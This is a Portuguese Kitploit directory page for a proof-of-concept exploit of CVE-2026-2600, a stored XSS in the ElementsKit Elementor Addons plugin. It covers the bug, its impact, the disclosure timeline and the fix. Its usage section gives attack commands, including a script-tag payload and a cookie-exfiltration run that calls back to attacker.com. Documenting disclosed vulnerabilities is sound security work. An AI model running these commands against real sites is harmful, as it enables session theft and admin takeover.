Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-2600-POC — Prova de conceito de exploit para CVE-2026-2600, um XSS armazenado em ElementsKit Elementor Addons <= 3.7.9, permitindo que Contribuidores autenticados injetem scripts arbitrários por meio de dados Elementor manipulados. | Kitploit
Ferramentas/GitHubGitHub/folks-iwd/cve-2026-2600-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubfolks-iwd/cve-2026-2600-poc

CVE-2026-2600-POC

Prova de conceito de exploit para CVE-2026-2600, um XSS armazenado em ElementsKit Elementor Addons <= 3.7.9, permitindo que Contribuidores autenticados injetem scripts arbitrários por meio de dados Elementor manipulados.

Ver Repositório
1há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-2600

ElementsKit Elementor Addons <= 3.7.9 — Cross-Site Scripting Armazenado Autenticado (Contributor+)

CVSS6.4 MÉDIO
Afetado<= 3.7.9
Corrigido3.8.0
Função mínimaContributor (edit_posts)
VetorRede / Baixa complexidade / Baixos privilégios

O bug

O widget Simple Tab renderiza os títulos das abas com HTML via echo, mas sem escape na saída. Em widgets/tab/tab.php, o loop de renderização faz:

root@kitploit:~
foreach ( $settings['ekit_tab_items'] as $index => $item ) {
    echo '<a ...>' . $item['ekit_tab_title'] . '</a>';
}

O editor do Elementor sanitiza a entrada no lado do cliente, mas o endpoint da API REST (/wp-json/wp/v2/posts/{id}) aceita o campo de metadados _elementor_data diretamente e ignora essa camada por completo.

Um Contributor autenticado pode fazer PATCH em um post com um payload JSON do Elementor manipulado que define ekit_tab_title como HTML arbitrário. Como o valor é armazenado literalmente em _elementor_data e exibido via echo sem esc_html() no momento da renderização, o script é executado no navegador de todos os visitantes quando a página carrega.

Impacto

Qualquer Contributor pode:

  • Roubar cookies de sessão e tokens de autenticação de todos os visitantes do site, incluindo administradores
  • Sequestrar contas de administrador e escalar para a tomada total do site
  • Implantar keyloggers ou overlays de captura de credenciais silenciosamente
  • Redirecionar visitantes para páginas de phishing ou sites de distribuição de malware
  • Desfigurar páginas de forma persistente — o payload sobrevive até ser removido manualmente

Mais de 400 mil instalações ativas foram afetadas no momento da divulgação.

Uso

root@kitploit:~
pip install requests
python3 poc.py https://target.com contributor p4ss

O script autentica via HTTP, obtém o nonce REST do editor administrativo, cria um post de rascunho, aplica PATCH em _elementor_data com o payload XSS embutido no campo ekit_tab_title e publica o post. A saída confirma se o payload está ativo no código-fonte da página.

root@kitploit:~
# Payload personalizado
python3 poc.py https://target.com contributor p4ss --payload '<script>alert(document.domain)</script>'

# Exfiltração de cookies com callback
python3 poc.py https://target.com contributor p4ss --type cookie --callback https://attacker.com/steal

# Modo de console interativo
python3 console_poc.py

Artigo completo

https://folks-iwd.github.io/writeups/cve-2026-2600.html

Linha do tempo da divulgação

DataEvento
Janeiro de 2026Descoberto por meio de revisão de diff no SVN. PoC confirmado.
Janeiro de 2026Reportado à Patchstack Alliance com artigo completo e PoC.
Março de 2026Wpmet lançou a correção na v3.8.0.
Abril de 2026CVE-2026-2600 publicado. CVSS 6.4 MÉDIO atribuído.

A correção

A Wpmet adicionou esc_html() ao redor da saída do título da aba em widgets/tab/tab.php:

root@kitploit:~
- echo '<a ...>' . $item['ekit_tab_title'] . '</a>';
+ echo '<a ...>' . esc_html( $item['ekit_tab_title'] ) . '</a>';
Baixar ferramenta